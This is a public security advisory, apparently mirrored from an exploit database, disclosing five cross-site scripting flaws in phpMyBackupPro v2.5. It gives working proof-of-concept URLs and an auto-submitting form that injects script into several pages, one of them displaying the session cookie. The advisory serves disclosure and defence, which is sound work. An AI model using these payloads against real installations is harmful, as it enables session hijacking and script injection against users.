###########################

# phpMyBackupPro 2.5 Cross Site Scripting Vulnerability

###########################

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/PHPMYBACKUPPRO-v2.5-XSS.txt



Vendor:
=============================
www.phpmybackuppro.net

project site:
sourceforge.net/projects/phpmybackup/



Product:
===========================
phpMyBackupPro v.2.5 (PMBP)

phpMyBackup Pro is a very easy to use, free, web-based MySQL backup
application, licensed under the GNU GPL.
You can create scheduled backups, manage and restore them, download or
email them and a lot more.



Vulnerability Type:
========================
XSS



CVE Reference:
==============
N/A



Vulnerability Details:
=====================

phpMyBackupPro is vulnerable to multiple XSS entry points allowing
arbitrary client side code execution within victims browser.
Undermining the trust between the client and server...if the user clicks an
infected linx or visits a malicious webpage.



Exploit code(s):
===============


XSS 1)
http://localhost/phpMyBackupPro-2.5/get_file.php?download=true&view=%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%27%29%3C/script%3E


XSS 2)
http://localhost/phpMyBackupPro-2.5/db_info.php?table=<script>alert('XSS
hyp3rlinx')</script>


XSS 3)
http://localhost/phpMyBackupPro-2.5/big_import.php?dbn=phpdug&fn=%3Cscript%3Ealert%28666%29%3C%2Fscript%3E&start=0&foffset=0&totalqueries=0&sn=0&delete=1


XSS 4)
http://localhost/phpMyBackupPro-2.5/big_import.php?dbn=
<script>alert(666)<%2Fscript>&fn=http%3A%2F%2Fhyp3rlinx.altervista.org
%2Fhell.sql&start=0&foffset=0&totalqueries=0&sn=0&delete=1


XSS 5)

<form id="XSS" action="http://localhost/phpMyBackupPro-2.5/sql_query.php"
method="post">
<input type="hidden" name="db" value="mysql" />
<input type="hidden" name="sql_query" value="<script>alert('XSS hyp3rlinx
\n\n'+document.cookie)</script>" />
<script>document.getElementById('XSS').submit()</script>
</form>



Disclosure Timeline:
=====================================
Vendor Notification: NR
February 16, 2016 : Public Disclosure



Exploitation Technique:
=======================
Remote



Severity Level:
================
High



Description:
=============================================================

Request Method(s): [+] GET / POST


Vulnerable Product: [+] phpMyBackupPro v.2.5 (PMBP)


============================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2016-02-19]

###########################